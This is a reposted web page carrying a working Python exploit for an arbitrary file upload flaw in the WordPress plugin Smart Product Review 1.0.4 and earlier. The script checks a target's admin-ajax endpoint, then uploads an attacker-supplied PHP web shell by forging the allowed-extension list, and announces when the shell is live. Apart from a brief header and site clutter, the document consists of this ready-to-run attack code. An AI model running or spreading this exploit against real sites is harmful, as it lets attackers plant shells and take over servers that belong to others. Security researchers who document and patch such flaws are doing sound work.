当前位置:网站首页>WordPress plugin smart product review 1.0.4 - upload of any file
WordPress plugin smart product review 1.0.4 - upload of any file
2022-06-23 22:13:00 【Khan security team】
supply Business Homepage :https://demo.codeflist.com/wordpress-plugins/smart-product-review/
edition :<= 1.0.4
test :Kali Linux
import os.path
from os import path
import json
import requests;
import time
import sys
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
def main():
banner()
if(len(sys.argv) != 3):
usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();边栏推荐
- [log service CLS] one click to start the efficient operation and maintenance journey of Tencent E-Sign
- Go language core 36 lectures (go language practice and application 26) -- learning notes
- API gateway verification token the role of adding a new authentication token in API gateway
- How the API gateway obtains the URI path and how the API handles local access failure
- Like playing a game? Take it and use it to build the park scene
- [emergency] log4j has released a new version of 2.17.0. Only by thoroughly understanding the cause of the vulnerability can we respond to changes with the same method
- Detailed explanation of lkadoc interface tool
- What if the fortress remote access server fails? What are the reasons why the fortress computer fails to connect to the server?
- Take you through the distributed file system
- Ten thousand words! Understand the inheritedwidget local refresh mechanism
猜你喜欢
北大、加州伯克利大學等聯合| Domain-Adaptive Text Classification with Structured Knowledge from Unlabeled Data(基於未標記數據的結構化知識的領域自適應文本分類)
Teacher lihongyi from National Taiwan University - grade Descent 2
The latest research progress of domain generalization from CVPR 2022
University of North China, Berkeley University of California, etc. | Domain Adaptive Text Classification with structural Knowledge from unlabeled data
Analysis of Alibaba cloud Tianchi competition -- prediction of o2o coupon
微信小程序中发送网络请求
Icml2022 | robust task representation for off-line meta reinforcement learning based on contrastive learning
Using the provider to transform the shit like code, the amount of code is reduced by 2/3!
Installation and use of Minio
Cloud native practice of meituan cluster scheduling system
随机推荐
Recommend several idea plug-ins
Relevant logic of transaction code MICn in SAP mm
什么是股票线上开户?手机开户安全么?
Error running PyUIC: Cannot start process, the working directory ‘-m PyQt5. uic. pyuic register. ui -o
What do you know about the 15 entry-level applets
Practice of business level disaster recovery switching drill
北大、加州伯克利大學等聯合| Domain-Adaptive Text Classification with Structured Knowledge from Unlabeled Data(基於未標記數據的結構化知識的領域自適應文本分類)
The latest research progress of domain generalization from CVPR 2022
Leetcode algorithm interview sprint sorting algorithm theory (32)
Teacher lihongyi from National Taiwan University - grade Descent 2
HR SaaS is finally on the rise
there can be only one auto column and it must be defined as a key
WordPress plug-in recommendation
One article to help you understand automatic injection
Introduction to scikit learn machine learning practice
德国弗莱堡大学、希尔德斯海姆大学等联合 | Zero-Shot AutoML with Pretrained Models(基于预训练模型的零样本AutoML)
To develop AI face comparison, how to output multiple faces with comparative similarity?
Manually push a message platform
Icml2022 | robust task representation for off-line meta reinforcement learning based on contrastive learning
API gateway verification token the role of adding a new authentication token in API gateway